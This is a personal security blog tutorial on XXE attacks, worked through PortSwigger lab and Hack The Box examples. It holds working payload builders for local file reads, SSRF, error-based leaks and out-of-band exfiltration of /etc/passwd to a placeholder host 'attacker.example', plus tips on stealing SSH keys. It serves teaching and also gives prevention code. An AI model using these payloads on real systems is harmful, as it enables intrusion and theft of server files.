OWASP Top 10 XXE (or taking liberties with acronyms)
As in my article on Command Injection, the aim of this post is to consolidate my knowledge of an issue in the OWASP Top 10 and to add to it as I learn more, so that I have a constantly expanding reference guide and can hopefully help out anyone who stumbles across this.
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XXE
- Broken Access Control
- Security Misconfiguration
- XSS
- Insecure Deserialisation
- Using Components With Known Vulnerabilities
- Insufficient Logging and Monitoring
This post is going to focus on number 4 on the list: XML External Entity, more commonly known as XXE.
XXE
Impact: 8 Risk: 7 Difficulty: 3
So what is an XXE?
XXE is a little inceptionesque when it comes to naming. XXE stands for XML External Entity, but the acronym within the acronym, XML, stands for Extensible Markup Language. Apart from playing fast and loose with E’s and X’s in acronyms, it’s pretty obvious even to the most technophobic of readers that, as the name suggests, XML is a markup language.
XML uses tags like HTML, only instead of boring h2s and ps the tags are user defined. Anyway, you can all look on Wikipedia, so I think we have reached the recommended daily dose of what XML does, except to say that it is a language that web sites use to structure the information they hold.
An example of an XML document can be seen below in Figure 1.
To understand XXE you must first understand the Document Type Definition (DTD). A DTD defines the structure of the XML file. DTDs can be internal or external: they can be defined within the XML file itself, or the file can reference one at a given external location.
DTDs hold entities, and an external entity uses the SYSTEM keyword to pull in content from a URI such as a local file path or a URL. Therein lies our vulnerability: if you can inject a DTD into an XML document that the server parses, you control what the parser fetches. For example, we can make the XML parser return information from the server or connect to our malicious server. Never trust a user. If this all sounds overly complicated, the examples below should clear it all up.
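To make the idea of an entity concrete, here is a minimal sketch of a harmless internal entity being expanded by Python's standard-library parser. The document, the `author` entity and the function name are all made up for illustration. An external entity has the same shape but uses `SYSTEM "some-uri"` instead of a literal value, and as far as I know `xml.etree.ElementTree` refuses to resolve those, so this only shows the safe half of the story.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the internal DTD declares one entity called "author",
# and the body references it as &author;.
DOCUMENT = """<!DOCTYPE note [
  <!ENTITY author "Alice">
]>
<note><from>&author;</from></note>"""


def expand_internal_entity(document: str) -> str:
    """Parse the document and return the text of <from> after entity expansion."""
    root = ET.fromstring(document)
    return root.findtext("from")


print(expand_internal_entity(DOCUMENT))  # prints: Alice
```

The parser swaps `&author;` for the value declared in the DTD. XXE abuses exactly this substitution, with the value coming from a file or URL that the attacker chooses.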
Pre-warning - this article contains spoilers for PortSwigger’s Web Academy XXE labs and the retired Hack The Box DevOops box.
Types of XXE
Types of XXE attack are:
- XXE with LFI
- XXE with SSRF
- XXE to exfiltrate data out of band
To cover each of these we will work through the labs available on PortSwigger’s Web Academy.
XXE with LFI
The Web Academy sets up a simple site that uses XML documents to check stock levels. Figure 2 shows the intended request and response in Burp Suite.
Figure 3 shows the altered request and the response showing the details of the requested file.
To come back to the explanation of an XXE, the external entity is the &xxe; that is defined and then called later on in the document, and thus injected into the server.
With the addition of the DOCTYPE line to declare the xxe external entity, and then calling it in the product ID, the server responds with the requested file. From there, follow the instructions in my LFI article to find interesting files and see if you can escalate.
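Since the request is easier to read as text, here is a rough sketch that builds a body of the kind described above. The `stockCheck`, `productId` and `storeId` element names are my recollection of the lab's stock checker and should be treated as assumptions, as should the function name. Check the real request in Burp before relying on them.

```python
def build_file_read_payload(path: str, store_id: int = 1) -> str:
    """Return a stock-check body whose productId is replaced by an external entity.

    Assumed element names: stockCheck, productId, storeId.
    """
    if not path.startswith("/"):
        raise ValueError("expected an absolute path such as /etc/passwd")
    system_uri = "file://" + path
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # The DOCTYPE line declares the external entity "xxe".
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{system_uri}"> ]>\n'
        # The entity is then referenced where the product ID would normally go.
        "<stockCheck>"
        "<productId>&xxe;</productId>"
        f"<storeId>{store_id}</storeId>"
        "</stockCheck>"
    )


print(build_file_read_payload("/etc/passwd"))
```

If the application reflects an invalid product ID in its response, the contents of the file should appear where the ID would have been.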
XXE with SSRF
This time the same site can be exploited by adding the following HTTP request in place of the file.
With this you are able to access another machine on the network (SSRF article coming soon) or your own malicious site to extract files from the server if the approach above doesn’t work.
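As a sketch of that swap, the only thing that changes is the SYSTEM identifier, which becomes an HTTP URL. The host `internal.example` is a placeholder, and the element names are again assumed to match the stock checker rather than taken from the original figure.

```python
from urllib.parse import urlsplit


def build_ssrf_payload(url: str) -> str:
    """Return a stock-check body whose entity points at an HTTP(S) URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc or '"' in url:
        raise ValueError("expected a plain http:// or https:// URL")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        # Same entity declaration as a file read, but the parser now makes a web request.
        f'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{url}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )


# internal.example is a hypothetical internal host.
print(build_ssrf_payload("http://internal.example/"))
```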
If you get no response from the LFI and SSRF attempts, it doesn’t always mean the target isn’t vulnerable. If you use a canary token or your own web server, you can try connecting back to it (with similar syntax to SSRF) and see if you can attach a file in the parameters.
OOB
For this we need to define an external DTD in order for the exploit to work. The first part of the image below is the external DTD that you host on your attacking system, and the second part is the request you send to your target.
The attack proceeds in the following stages:
- A POST request with the above body is sent to the target server.
- If vulnerable, the XML in the request instructs the target server to fetch the external DTD from the attacker-webserver, which sends it back to the target server.
- A GET request with the contents of the requested /etc/passwd file appended is sent to the attacker-webserver, where it can be found in the logs.
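The two pieces in those stages can be sketched as text. This follows the commonly documented out-of-band pattern rather than reproducing the original image. `attacker.example`, `malicious.dtd`, the `x` query parameter and the stock-check element names are all placeholders I have assumed.

```python
def build_exfil_dtd(callback_base: str, target_file: str = "/etc/passwd") -> str:
    """External DTD hosted on the attacking system.

    %file reads the target file, %eval declares %exfiltrate dynamically, and
    %exfiltrate makes the GET request with the file contents in the query string.
    """
    return f"""<!ENTITY % file SYSTEM "file://{target_file}">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '{callback_base}/?x=%file;'>">
%eval;
%exfiltrate;
"""


def build_oob_request(dtd_url: str) -> str:
    """Body of the POST sent to the target, which pulls in the external DTD."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe; ]>\n'
        "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
    )


# Hypothetical attacker host.
print(build_exfil_dtd("http://attacker.example"))
print(build_oob_request("http://attacker.example/malicious.dtd"))
```

The nested declaration uses `&#x25;` in place of `%` because a parameter entity cannot be declared directly inside another entity's value. Multi-line files often do not survive being placed in a URL, so a one-line file may be a more reliable first test.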
These should cause DNS and HTTP requests to your web server. If you receive one and not the other, further debugging may be required. For example, this article uses a file upload on the site to host a DTD.
Error Based
As an alternative when faced with a blind exploit, you can attempt to retrieve sensitive files via an error-based response, in which the parser’s error message leaks the contents of the requested file. Using this method, you request the document you wish to read and then use its contents as part of the path to one that does not exist.
This first image shows the external DTD that you host on your server, upload to the site, etc.
And this one is the request to execute it.
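In text form, the error-based DTD looks roughly like the sketch below. It is the usual published pattern, not a copy of the original image, and the `/nonexistent` directory and function name are assumptions. The request that triggers it simply declares a parameter entity pointing at wherever this DTD is hosted and then references it.

```python
def build_error_dtd(target_file: str = "/etc/passwd", missing_dir: str = "/nonexistent") -> str:
    """External DTD that forces a 'file not found' error containing the target file.

    %file reads the file you want, and %error then tries to open a path made of
    a directory that does not exist followed by that file's contents.
    """
    return f"""<!ENTITY % file SYSTEM "file://{target_file}">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://{missing_dir}/%file;'>">
%eval;
%error;
"""


print(build_error_dtd())
```

If the application returns parser errors to the client, the failed path (and therefore the file contents) should show up in the response.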
Of course, in some cases firewalls aren’t going to allow this, and in those cases you can attempt to use a DTD that already exists on the web server. This article lists various ways to exploit a target if it has access to a known DTD. An example using this method can be seen below:
How do I find XXE?
XXE should be tested anywhere an XML document is submitted. Although the examples above are oversimplified, in the real world the XML is likely to contain many elements, and each of them must be tested. Different sites produce XML for different reasons. Once your recon of a site is complete, check your Burp logs for any XML documents being sent to the server and give them a try.
Keep an eye out for Content-Type: application/xml in requests.
But everything is JSON these days. Well, it’s still possible to convert the JSON to XML and attempt the exploit. Convert it with an online tool, change the content type to the above, and it might sneak through. For more details on this, see this great article.
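If you would rather not paste request bodies into an online tool, the conversion is simple enough to sketch locally. The mapping below (one element per key, `item` for list entries, a `root` wrapper) is just one plausible convention I have assumed. The server may expect a different shape, so expect some trial and error.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_text: str, root_tag: str = "root") -> str:
    """Convert a JSON body into a simple XML document, one element per key."""

    def fill(parent: ET.Element, value) -> None:
        if isinstance(value, dict):
            for key, child_value in value.items():
                fill(ET.SubElement(parent, key), child_value)
        elif isinstance(value, list):
            # Lists have no natural XML form; "item" is an arbitrary choice.
            for entry in value:
                fill(ET.SubElement(parent, "item"), entry)
        elif value is not None:
            parent.text = str(value)

    root = ET.Element(root_tag)
    fill(root, json.loads(json_text))
    return ET.tostring(root, encoding="unicode")


print(json_to_xml('{"productId": 1, "storeId": 2}', root_tag="stockCheck"))
# prints: <stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>
```

The serialiser escapes `&`, so the DOCTYPE line and the entity reference still have to be added to the converted body by hand before sending it with the XML content type.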
Another place to look for XXE is in file uploads. If you can’t manage to upload a reverse shell, sometimes these file uploads accept XML documents. The example below is from Hack The Box DevOops and shows an LFI being executed through an XML file upload.
Now that we know the users on the system and their home directories, we can check for SSH keys as seen below.
Payloads
A list of all the XXE payloads you could possibly want is available in the PayloadsAllTheThings repository on GitHub.
Examples in Hack The Box
For those wishing to practice XXE, there are examples on DVWA and Juice Shop, as well as the retired Hack The Box machines below:
- Aragog
- Fulcrum
- DevOops
Prevention
Disable any unused XML parsing features that attackers could use to run XXE, in particular the resolution of external entities and support for XInclude.
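How you switch those features off depends on the parser, so treat the following as one possible sketch rather than a recipe. It takes the bluntest approach of refusing any document that carries a DOCTYPE at all, using only Python's standard library. The function and exception names are my own.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a submitted document carries a DOCTYPE declaration."""


def parse_rejecting_doctype(document: str) -> ET.Element:
    """Parse XML only if it contains no DTD, so no entity can be declared."""

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    # First pass: expat calls the handler as soon as it meets a DOCTYPE,
    # and the exception raised there propagates out of Parse().
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid_doctype
    checker.Parse(document, True)

    # Second pass: the document is DTD-free, so parse it normally.
    return ET.fromstring(document)


safe = parse_rejecting_doctype("<stockCheck><productId>1</productId></stockCheck>")
print(safe.findtext("productId"))  # prints: 1
```

Rejecting DTDs outright is only suitable where the application never needs them. Otherwise the parser's own options for disabling external entity resolution and XInclude are the thing to look for.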
Disclaimer
As with all techniques of this type, these methods should only be used against systems you own or those you have the express written permission of the owner to test. Using them against any other system is illegal.
Conclusion
This has been a brief overview of how to find and exploit XXE. The combination of the Web Academy and Hack The Box should be sufficient to get your head around this topic, and then it’s just a case of expanding this to bigger documents in the wild. Check back from time to time, as I will be adding new content to this page and others as I discover more things. XXEs most commonly result in the ability to read files on the system, which can potentially be escalated, or to connect to internal networks and services or an external malicious host.
If you have any comments or questions, please contact me on Twitter via the link at the top of the page.